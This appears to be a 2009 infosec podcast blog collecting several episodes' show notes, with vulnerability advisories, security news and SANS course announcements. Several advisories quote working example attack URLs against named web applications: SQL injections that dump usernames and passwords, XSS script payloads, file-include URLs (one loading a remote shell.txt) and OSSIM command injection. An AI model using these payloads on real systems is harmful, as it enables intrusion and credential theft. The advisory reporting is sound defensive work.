As we will be partying in the New Year we’ve decided not to do a Podcast today.

InfoSec Daily Podcast

 

InfoSec Podcast Episode 37 for December 30, 2009. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. When your systems are down, as a small and medium-sized businesses the resulting downtime can have a devastating impact.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Goto www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10

Go online to register by going to http://www.sans.org/atlanta-cs-events-2010/?utm_source=web-sans&utm_medium=banner&utm_content=Featured_Community_SANS_atlanta-2010-cs_events&utm_campaign=Community_SANS_Atlanta_2010&ref=52093

or call (301) 654-SANS(7267).

Vulnerabilities of Interest:

1. RoseOnlineCMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input which could be exploited to obtain potentially sensitive information or to execute local scripts. RoseOnlineCMS 3 B1 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/modules/admincp.php?admin=[LFI%00]
2. phpAuction is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data this could lead to execution of script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Example URLs: http://www.example.com/phpauction/register.php?TPL_name=1>”><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&TPL_nick=indoushka&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com and http://www.example.com/phpauction/register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C/ScRiPt%3E&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com&TP
3. The ‘com_adagency’ component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input which could allow an attacker to potentially obtain sensitive information and execute local scripts in the context of the webserver process. Example URL: http://www.example.com/index.php?option=com_adagency&controller= [-LFI-]
4. The Memory Book component for Joomla! is subject to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability which could allow an attacker to compromise the application, upload files, execute code, access or modify data, or exploit other vulnerabilities in the underlying database. Memory Book 1.2 is vulnerable; other versions may also be affected. All you need is a browser to exploit this vulnerability.
5. DrBenHur.com DBHcms is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input which could allow an attacker to include an file containing malicious PHP code and execute it in the context of the webserver process. This may lead to a compromise of the application and the underlying system; other attacks are also possible. DBHcms 1.1.4 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/index.php?dbhcms_core_dir=http://www.example.org/shell.txt%00
6. UPDATE: Microsoft IIS security-bypass vulnerability was reported to have a vulnerability which could cause IIS to interpret unexpected files as CGI applications. For an exploit to succeed, IIS must be configured in a nondefault way and contrary to the vendor’s recommended best practices.
7. The Q-Personel component for Joomla! is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input which could be leveraged to execute script code in the browser of an unsuspecting user. Q-Personel 1.0.2(RC2) is vulnerable; other versions may be affected as well. Example URL: http://www.example.com/j15x/index.php?option=com_qpersonel&task=sirala&personel_sira=[XSS CODE]
8. Stash is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data which could be leveraged to execute script code in the browser of an unsuspecting user. Stash 1.0.3 is vulnerable; other versions may also be affected. To exploit these issues, an attacker get the victim into following a malicious URL.
9. Calendar Express is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query which could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Example URL: http://www.example.com/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+usi

News item 13:http://www.scmagazineuk.com/mbna-confirms-data-loss-after-laptop-containing-personal-details-of-thousands-of-customers-was-stolen-from-vendor/article/160217/
http://www.net-security.org/secworld.php?id=8656
http://www.lep.co.uk/news/Customer-credit-card-details-stolen.5929370.jp
MBNA is notifying thousands of customers that a laptop stolen from NCO Europe offices contains their credit card information. NCO Europe is a third-party contractor. Although the files do contain personal information, no PINs are believed to be included. While no fraudulent activity has been detected on the compromised accounts, MBNA is offering affected customers one year of credit monitoring service and is monitoring all compromised accounts.

InfoSec Daily Podcast

 

InfoSec Podcast Episode 36 for December 29, 2009. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Vulnerabilities of Interest:

1. APC Switched Rack Power Distribution Units (PDU) is subject to a cross-site scripting vulnerability because the device’s web interface fails to properly sanitize user-supplied input.  This may be leveraged to execute script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.  APC Switched Rack PDU AP7932 is vulnerable; other version may also be affected.Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI. Example URL is available:http://www.example.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
2. The Kleinanzeigenmarkt plugin for Woltlab Burning Board is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could result in a compromise of the application, accessing or modifying data, or exploiting the underlying database. All it takes is a browser to exploit this issue. Exploit code is available in the wild.
3. Pragyan CMS is subject to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.   This could result in compromising the application as well as the potentially the complete system.  Pragyan CMS 2.6.4 is vulnerable; other versions may also be affected. Exploiting these issues is as simple as using a browser and the example URLs: http://www.example.com/cms/modules/search/search.php?moduleFolder=[Evil] and http://www.example.com/cms/modules/search/search.php?sourceFolder=[Evil].
4. Jax Guestbook is subject to an authentication-bypass vulnerability which could allow an attacker to gain administrative access to the affected script and/or make configuration changes.  This could potentially lead to further attacks.  Jax Guestbook 3.50 is vulnerable; other versions may also be affected.  Exploiting these issues is as simple as using a browser and the example URL: http://www.example.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0
5. MyBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input which may be leveraged to execute script code in the browser of a user in the context of the affected site.  This could allow the attacker to steal cookie-based authentication credentials and to launch additional attacks.  MyBB 1.4.10 is vulnerable; other versions may be affected as well. Exploiting this issue requires enticing an user to follow a malicious URL  Example URLs are available: http://www.example.com/myps.php?action=donate&username=”/> and  http://www.example.com/myps.php?action=donate&username=<IMG”"”>”> .
6. The Automated Logout module for Drupal is subject to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.   This may be leveraged to execute script code in the browser of a user in the context of the affected site.   Automated Logout 6.x-1.6, 6.x-2.2 and prior versions are vulnerable.
7. Wireshark is subject to multiple denial-of-service vulnerabilities and a buffer-overflow vulnerability which may allow an attacker to crash the application and deny service to legitimate users. Additionally, there is the possibility that these vulnerabilities could result in the execution of code in the context of users running the application.  These issues affect Wireshark 0.9.0 through 1.2.4. Proof-of-concept capture files for the denial-of-service issues are available from the following locations:  https://bugs.wireshark.org/bugzilla/attachment.cgi?id=4055 and http://www.wireshark.org/download/automated/captures/fuzz-2009-12-07-11141.pcap.
8. The ‘com_schools’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.  Exploiting this issue could allow an attacker to compromise the application, access or modify data in the underlying database. Example URL code is available: http://www.example.com/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users–
9. Microsoft IIS is prone to a security-bypass vulnerability that may result in IIS interpreting unexpected files as CGI applications. Attackers may be able to exploit this vulnerability to bypass intended security restrictions.  Reports indicate that IIS 7.5 is not vulnerable to this issue; furthermore, it is currently unknown if IIS 7.0 is vulnerable.

Amazon.com’s Hot Holiday Bestsellers (Nov. 15 through Dec. 19, based on units ordered):

• Electronics: Kindle Wireless Reading Device; Apple iPod touch 8 GB; and Garmin nuvi 260W 4.3-inch GPS
• Toys: Scrabble Slam Cards; The Settlers of Catan; and Scene It? Twilight Deluxe Edition
• Video Games and Hardware: Wii Fit Plus with Balance Board; New Super Mario Bros; and Call of Duty: Modern Warfare 2

News item 2: http://seclists.org/fulldisclosure/2009/Dec/438
As discussed last week, it appears that DECAF was disabled the authors at decafme.org.  Well, it looks like some people over at soldierx.com have patched the binary to re-enable it and remove the phone home functionality. The files are at http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or http://www.multiupload.com/88TEOEYCSZ. Of the sites listed on the multiupload.com site, I had problems with both RapidShare and MegaUpload. The other sites seemed to work well.

News item 3: http://ontheflix.com/2009/12/25/celtics-ray-allen-twitter-account-gets-hacked-sends-naughty-tweets/
It seems that  Celtics shooting guard  Ray Allen’s  Twitter account was hacked & apparently was sending some pretty naughty tweets. The Huffington Post is reporting that tweets such as: “I’m getting there. When you masturbate think about my tongue or your cl*t and switching back and forth from my d**k to my tongue.”

The tweets got deleted later on,and 14 minutes later, another tweet showed up stating an apology,and claiming he was not responsible. It read like this: “I’m sorry my acct was hacked into. I need to changey tweet handle.” Then he changed his Twitter name from @sugarray20 to @greenrayn20.   Ray Allen said he may have to get off “Twitter” if this continues to happen. He tweeted, “i hope that it was amusing to people but im either gonna change my password or stop tweeting altogether.”

News item 4: http://www.wired.com/dangerroom/2009/12/not-just-drones-militants-can-snoop-on-most-us-warplanes/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+wired%2Fpolitics+%28Wired%3A+Politics%29
Wired Magazine is reporting that militants tapping into drones’ video feeds was just the start.   Apparently, the U.S. military’s system for bringing overhead surveillance down to soldiers and Marines on the ground is also vulnerable to electronic interception.  That means militants have the ability to see the video feeds from traditional fighters and bombers to unmanned spy planes. The problem is in the process of being addressed. But for now, an enormous security breach is even larger than previously thought.

So what is to blame?  Apparently, the feeling is that early on units were “fielded so fast that it was done with an unencrypted signal. It could be both intercepted (e.g. hacked into) and jammed”.  The question is why is it taking 10 years to fix the issue?   You’ve got satellite providers in the L, C, S, Ku [satellite] bands that are sending data encrypted.  So it’s not like this is new technology.  What’s the big deal?  Well, imagine trying to ensure that all units in a theater have the correct encryption/decryption keys necessary receive the data they need.  This is really where the issue is.   Do you trust the small units with these keys?  How do you handle key rotation?

News item 5: http://blog.tenablesecurity.com/2009/12/top-10-nessus-plugins-for-2009.html

In 2009, Tenable released over 8,100 new plugins (and the year isn’t over yet!). These plugins have covered several different types of vulnerabilities, including web applications, embedded systems, local checks for operating systems and much more. Tenable polled it’s employees to find some of our favorite plugins released this year,and compiled the following list:

1. DD-WRT HTTP Daemon Metacharacter Injection Remote Code Execution – This vulnerability allows remote attackers to inject commands via a flaw in the HTTP management web application on embedded systems running DD-WRT.
2. Windows Remote Registry Enable/Disable – For remote authenticated checks to run on Windows systems, the remote registry service needs to be enabled. While this may not be a service you wish to run on all your systems, this plugin solves that problem by temporarily enabling and then disabling the remote registry service when the scan has completed.
3. PCI Test Requirements – Back in April of 2009, I wrote a blog posted titled, “PCI DSS Auditing Linux, Apache, PHP & MySQL with Nessus 4″.
4. USB Drives Enumeration – In 2009, over 218 million records fell into the wrong hands due to some form of breach (According to a report generated by DataLossDB). Some of those data loss incidents can be attributed to removable media such as USB thumb drives.
5. Malware Infected Host -  This Nessus plugin will seek out and report on these types of HTTP servers.
6. Dell Remote Access Controller Default Password (calvin) for ‘root’ Account
7. Conficker Detection (uncredentialed check) – Conficker was one of the major malware releases in 2009. This Nessus plugin could detect it on remote systems without using credentials.
8. Backported Security Patches (HTTP) -  This plugins look at Linux distribution banners for common FTP, HTTP and SSH services that seem as if they have not been patched, but are in fact most likely to have been fixed.
9. Microsoft Windows SMB Shares Access – This plugin that keeps on giving! A simple plugin, but one of the most likely to fire during an internal audit where Windows machines are found. The shared drives could contain nothing or they could contain the entire HR database.
10. Enhanced Web Application Testing Plugins – Not a plugin per-se, but bunch of enhanced web app tests that didn’t exist with all the new options before ‘09.

News item 6: http://www.wafb.com/Global/story.asp?S=11661499

A story about a 21-year old being caught on camera is probably nothing new.  Stealing a decoy cameras is probably a little odd.   Having a land owner had set up the decoy cameras to capture the theft of his digital game surveillance cameras is even more odd.   Believe it or not, Dustin Archibald of Denham Springs was caught on camera stealing a camera with a “No Trespassing” sign visible in the background.

Archibald claims that he was not stealing the camera, but  rather taking it so the landowner would not be able to hunt deer in the area. Unfortunately, with the property owner’s photographic evidence from his surveillance cameras,  Archibald was identified right away and he consequentially turned himself into authorities.

The take-away here is that you never know what is watching a device that watches.

InfoSec Daily Podcast

 
Tonight we are joined by a very special guest, Dave Shackleford.  Dave is the Director, Risk & Compliance and Interim Director, Security Assessments at Sword & Shield Enterprise Security, Inc.  (http://www.sses.net).  Additionally, Dave is the SANS Institute GIAC technical director.  Dave is the co-author of Hands-On Information Security from Course Technology as well as the “Managing Incident Response” chapter in the Course Technology book Readings and Cases in the Management of Information Security.  Recently, Dave co-authored the first published course on virtualization security for the SANS Institute.  Dave currently serves on the board of directors at the Technology Association of Georgia’s Information Security Society and the SANS Technology Institute.  Author of the Shackfoo article titled “One for the n00bs“.

Merry Christmas from our family to yours.

Merry Christmas to all.  We will be taking a few days off to enjoy the Christmas Holiday.  We will be back on the 28th with Episode 35.

Vulnerabilities of Interest:

1. IBM Tivoli Storage Manager is prone to multiple vulnerabilities with multiple buffer-overflow issues and multiple unauthorized-access issues.  Exploiting these issues to cause a denial-of-service condition, code execution, as well as the ability to read, copy, edit, or delete files on a victim’s computer.  Core Security has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.  A Metasploit exploit module is available.
2. PHP is subject to an ‘open_basedir’ restriction-bypass vulnerability because of a design error.  This vulnerability could be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code. In such cases, ‘open_basedir’ restrictions are expected to isolate users from each other. PHP 5.2.11 and 5.3.0 are vulnerable; other versions may also be affected. Attackers may exploit these issues by crafting and executing standard PHP code.   Exploits are available in the wild.
3. HP Operations Manager is subject to a remote unauthorized-access vulnerability that could allow uploading and execution of code with SYSTEM-level permissions.  Operations Manager 8.1 for Windows is vulnerable; other versions may also be vulnerabl.  Attackers can use readily available tools to exploit this issue.  Core Security has  a working commercial exploit for its CORE IMPACT product.   Additionally, a working commercial exploit is available through VUPEN Security – Exploit and PoCs Service.
4. The JEEMA Article Collection component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could result compromising the application, access or modify data in the underlying database. URL example: http://www.example.com/index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection
5. Simple PHP Blog is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input.  This can be leveraged to obtain potentially information or to execute local scripts in the context of the webserver process.  Additionally, this may allow a compromise of the application and the underlying computer; other attacks are also possible.  Simple PHP Blog 0.5.1 is vulnerable; other versions may also be affected. Exploit code is available in the wild.

News item 1: http://online.wsj.com/article/SB126102247889095011.html?mod=googlenews_wsj
The Wall Street Journal is reporting the insurgents in Iraq have been able to use $26 off-the-shelf software to intercept live video feeds from U.S. Predator drones.  U.S. officials say there is no evidence that militants were able to take control of the drones or otherwise interfere with their flights. Still, the intercepts could give America’s enemies battlefield advantages by removing the element of surprise from certain missions and making it easier for insurgents to determine which roads and buildings are under U.S. surveillance.

The potential drone vulnerability lies in an unencrypted downlink between the unmanned craft and ground control. The U.S. government has known about the flaw since the U.S. campaign in Bosnia in the 1990s

News item 2: http://blogs.computerworld.com/15234/google_ceo_if_you_want_privacy_do_you_have_something_to_hide
Apparently, Eric Schmidt CEO Google said while appearing on CNBC … “If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place.” Suggesting that folks seeking privacy might not want to look to the Internet to find it.

EFF’s Richard Esguerra reminds us why we should care:

Schmidt’s statement makes it seem as if Google … is not even concerned enough to understand basic lessons about privacy and why it’s important. … Schmidt’s statement is painfully similar to the tired adage of pro-surveillance advocates that incorrectly presume that privacy’s only function is to obscure lawbreaking: “If you’ve done nothing wrong, you’ve got nothing to worry about.”
…

News item 3:  http://news.cnet.com/8301-13506_3-10416383-17.html?part=rss&subj=news&tag=2547-1_3-0-20

Career site Glassdoor.com has announced the employees’ choice awards for the top 50 best places to work. No tech companies made the top five, but according to Glassdoor, Southwest Airlines, General Mills, Slalom Consulting, Bain & Co., and McKinsey & Co. were the best places to work this year. Only General Mills and Bain & Co. were in the top five last year.

On the tech side, it was enterprise-solution provider Juniper Networks that led the way for the industry, placing 10th in the list with a 3.9 (out of 5) company rating from employees. Google placed 14th with a 3.9 rating, followed by NetApp, which also received a 3.9 rating. Last year, Google was ranked seventh on the list. NetApp was ranked 10th.

Some other tech notables from the list: Apple placed 22nd with a 3.8 company rating, which is a little lower than last year’s 19th place. Online career site CareerBuilder took the 26th spot with a 3.7 rating. The site experienced a steep decline, dropping eight spots from its 2008 ranking of 18th.

Companies that have offices in Atlanta:

News item 4: http://www.heraldtribune.com/article/20091223/ARTICLE/912231066?Title=U-S-faces-shortage-of-cyber-defenders

Apparently the federal government is struggling to fill a growing demand for skilled computer-security workers, from technicians to policy-makers, at a time when network attacks are rising in frequency and sophistication.

Demand is so intense that it has sparked a bidding war among agencies and contractors for a small pool of special talent: skilled technicians with security clearances. Their scarcity is driving up salaries, depriving agencies of skills, and in some cases affecting project quality.

News item5: http://www.examiner.com/x-3693-NY-Internet-Examiner~y2009m12d23-Hackers-and-Spammers-Exploiting-Brittany-Murphys-Death?cid=channel-rss-Gadgets_and_Tech

The Examiner is reporting that less than 24 hours after her sudden death, hackers and spammers had already begun using her name in poisoned search results and spam messages. They used SEO techniques to move their malicious links to the top of the search results for her name and keywords related to her and her death. When clicked on the links led to sites that attempted to download fake anti-virus software onto the visitor’s computer.

News item 6: http://www.networkworld.com/community/node/49237

Network World has an article on the Obama appointment of Howard Schmidt to become the nations first Cybersecurity Coordinator. Schmidt will report to the National Security Council (NSC) and National Economic Council (NEC).

The article asks the question if Schmidt is the right person for this job? They state that Schmidt has experience at US-CERT, DHS, the U.S. Air Force, the White House, Microsoft, and eBay. He is also a well respected father figure in the security industry.  The article goes on to state that Schmidt must begin to address several major challenges such as:

1. Sophisticated adversaries. On the day that Schmidt was announced, the major security story centered on a multi-million dollar cybersecurity attack of Citigroup last summer. Citigroup is no security lightweight so if its systems can be compromised there are a lot of sitting ducks out there. Cyberwar is a real threat in the next decade.

2. A cybersecurity hot potato. As of this writing, there are a number of cybersecurity bills in committee and a lot of rhetoric on the Hill. Meanwhile, DHS, DOD, and NSA have complementary and competitive cybersecurity roles that need to be ironed out. There has also been massive spending on cybersecurity — some useful and some wasteful. We desperately need a non-elected leader to seperate cybersecurity needs from politics and pork.

3. A real lack of knowledge. Cybersecurity knowledge is in short supply. Business guys know they need to do something but are unsure what to do. Technologists often look at security in myopic terms related to IT. Consumers haven’t a clue. We need a federally-driven education program that spans public awareness campaigns all the way through scholarships and continuing education.

DC404 Meeting report:
While at the DC404 meeting on Saturday, we were privileged to have CEO Nick Owen from WikiD Systens discuss his companies product.   Nick began by giving us an overview of how WikiD works.  Which begins with a user selecting the domain they wish to use and enters the PIN into their WiKID Two-factor client. It is encrypted with the WiKID Server’s public key – assuring that only that server can decrypt it with its private key. If the server can decrypt the PIN and it is correct and the account is active, it generates the one-time passcode (OTP) and encrypts it with the client’s public key. The user then enters their username and the OTP into whatever service they are using, a VPN e.g., which forwards it to the WiKID Server for validation.

He then touched on the WiKID supported operating systems which includes Windows, Mac, Linux, J2ME, PocketPC/SmartPhone/Windows Mobile or Blackberry.  Finally, he discussed the network clients that WiKID supports such as RADIUS, LDAP, and SSL via both a Java bean and a COM object.  He also indicated that they have plug-ins for Juniper (formerly Funk) Steel Belted Radius and Citrix Web Interface.

Over all, WikiD looked interesting and is probably something that we should look into.

InfoSec Daily Podcast

 

Tonight we are joined by a very special guest, Kevin Johnson from Inguardians. Kevin who is also affectionately known as the “Hacker Princess” gives us some insight into what it’s like to work at Inguardians with such luminaries as Ed Skoudis and Mike Poor.  We also get some information on his Social Network Security research and Samurai WTF.

Announcements:

Community SANS Atlanta 2010 Spring Schedule has been posted. There are 5 classes currently being offered. Leading off with Scott Moulton’s SEC606. SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10 SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10 AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10 MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10 SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10 Go online to register by emailing sales@sans.org or call (301) 654-SANS(7267).

InfoSec Daily Podcast

 
Community SANS Atlanta 2010 Spring Schedule has been posted.  There are 5 classes currently being offered.  Leading off with Scott Moulton’s SEC606.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Go online to register by emailing sales@sans.org or call (301) 654-SANS(7267).

DC404 meeting is this Saturday, December 19th @ 2PM at the Vortex Midtown.  Nick Owen will be presenting on “WiKiD Two-factor Auth and Securing Network Access with Open Source Solutions”.  For more information and direction go to dc404.kaos.to or simply google DC404.
Vulnerabilities of Interest:

1. Mozilla Firefox and Sea Monkey are affected by a spoofing vulnerability. An attacker could exploit  this issue to place a legitimate-looking but invalid URL in the location bar and inject HTML and JavaScript into the body of the webpage, To exploit this issue, an attacker must entice an unsuspecting user to view a maliciously crafted web document.
2. Xpdf is prone to multiple integer-overflow vulnerabilities. Exploiting these issues may allow remote attackers to execute arbitrary code in the context of an affected application or cause denial-of-service conditions. A commercial proof of concept is available through VUPEN Security – Exploit and PoCs Service. A seperate proof of concept is publicly available and known to be circulating in the wild.
3. Winamp is prone to multiple integer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input. Attackers may leverage these issues to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. These issues affect versions *prior to* Winamp 5.57. A commercial proof of concept is available through VUPEN Security – Exploit and PoCs Service.
4. Zen Cart is prone to a security vulnerability that may allow attackers to obtain sensitive information or delete the application’s database. An attacker can exploit this issue to view files in the context of the webserver process and delete the application’s database. Successful exploits may lead to further attacks. An attacker can exploit this issue via a browser.
5. WHMCS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following is an example URL: http://www.example.com/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user
6. WP-Forum WordPress plugin is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Versions prior to WP-Forum 2.4 are vulnerable. Attackers can use a browser to exploit these issues. The following URL strings are available:

   http://www.example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0

   http://www.example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0

   http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0

   http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1

   http://www.example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0

   http://www.example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1

   http://www.example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1

   Exploit code is available in the wild.

7. OSSIM is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands because the application fails to adequately sanitize user-supplied input.Successful attacks can compromise the affected application and possibly the computer. These issues affect OSSIM 2.1.5; other versions may be affected as well. The following URL strings are available:

   http://www.example.com/ossim/sem/wcl.php?uniqueid=1;ls%20%3E%20/tmp/listing

   http://www.example.com/ossim/sem/storage_graphs.php?uniqueid=;ls%20%3E%20/tmp/listing;

   http://www.example.com/ossim/sem/storage_graphs2.php?uniqueid=;ls%20%3E%20/tmp/listing;

   http://www.example.com/ossim/sem/storage_graphs3.php?uniqueid=;ls%20%3E%20/tmp/listing;

   http://www.example.com/ossim/sem/storage_graphs4.php?uniqueid=;ls%20%3E%20/tmp/listing;

8. Quick Heal AntiVirus is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges, resulting in a complete compromise of the affected computer. Quick Heal AntiVirus 2010 is vulnerable; other versions may also be affected.  An attacker can use readily available command-line utilities to exploit this issue.

News item 1:http://www.neowin.net/news/main/09/12/16/us-and-russia-hold-secret-talks-on-fighting-cyber-crime?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+neowin-main+(Neowin.net+Main+News)
An update to the news item that we had on the U.S. joining the UN talks on Cybersecurity are that they have apparently been in secret talks with Russia. This may be directly related to the Albert Gonzalez attacks involving Russian citizens.

News item 2: http://www.csoonline.com/article/511269/Hackers_Take_Twitter_Offline_Again?source=rss_news
Twitter went offline for a while Friday after hackers calling themselves the Iranian Cyber Army apparently managed to change DNS records, redirecting traffic to another Web page.  Iranian hackers are responsible for the attack wasn’t immediately clear. However, Twitter and other Internet sites have been used by Iranian opposition groups and protestors to share details of anti-government protests in that country.

Twitter blamed the outage on changes made to the company’s DNS (Domain Name System) records, which match the company’s domain name with the IP addresses of its servers.

“Twitter’s DNS records were temporarily compromised but have now been fixed. We are looking into the underlying cause and will update with more information soon,” Twitter said on its Twitter Status page.

News item 3: http://government.zdnet.com/?p=6507
According to Doug Hanchard at ZDNet, Regulators such as CRTC, Ofcom, FCC should be concerned with the opening up of wireless phone operating systems.  The article goes on to explain that there should be a set of standards and verification tools that regulators use to verify software code on a phone and must be LOCKED DOWN prior to release. Because a wireless phone has access to both communications platforms – the public switched telephone network (PSTN) and internet, the danger is significant and no software application should be released without vetting its ability to withstand attacks to and from the user’s device. There is a genuine threat to national security of every country’s phone network. There should be penalties for software applications that create vulnerabilities impacting the telephone network.

News item 4:  http://www.theregister.co.uk/2009/11/11/hooksafe_rootkit_protection/
Researchers at North Carolina State University and a researcher from Microsoft released a hypervisor-based system called  “HookSafe.”  http://www.sigsac.org/ccs/CCS2009/techprogram.shtml (Session 17).  Hooksafe relocates kernel hooks in a guest host to a page-aligned memory space.  Hooksafe successful prevented nine “real-world” rootkits targeting a Ubuntu 8.04 guest with only a 6% reduction in performance benchmarks.  In the test, Hooksafe achieves this protection by relocating 5.881 kernel hooks across 41 physical pages with some in dynamic kernel heap.  Their paper:  http://discovery.csc.ncsu.edu/pubs/ccs09-HookSafe.pdf Notes:  By leveraging hardware-based virtualization support to intercept and validate write attempts to hardware registers, HookSafe has hardware register protection capabilities, which in turn subverts attempts to overwrite HookSafe’s protected memory.  The paper assumes that the system is trusted at boot, and subsequently a trustworthy hypervisor can be securely loaded and that runtime integrity of hypervisor is maintained.  So while HookSafecan can potentially resolve and protect kernel hooks that it relocates,  it doesn’t address VMBRs(Virtual Machine Based Rootkits) or SMBRs(System Managemnt Mode Based Rootkits).  Check out the Press and Resources sections over at http://invisiblethingslab.com for more information on VMBRs and SMBRs.  BlackHat paper from ’08 on SMM Rootkits:  http://www.eecs.ucf.edu/~czou/research/SMM-Rootkits-Securecom08.pdf.  For information on VMBRs, you might want to checkout SubVirt (remember the “Blue Pill” discussions?).

News item 5: http://blog.seattlepi.com/microsoft/archives/188706.asp
Anti-COFEE tool DECAF revealed as spoof.  Two developers said they created a tool, called DECAF, that compromises Microsoft’s COFEE computer-forensics tool by killing its processes, disabling a computer’s connection ports and even conjuring up fake MAC addresses.

It’s fake.

The developers posted an explanatory video, highlighted DECAF’s supposed features, promised pie-in-the-sky updates (such as the ability to send DECAF a text message to trigger “Lockdown Mode”) and appealed to expert developers for help in making better forensics tools.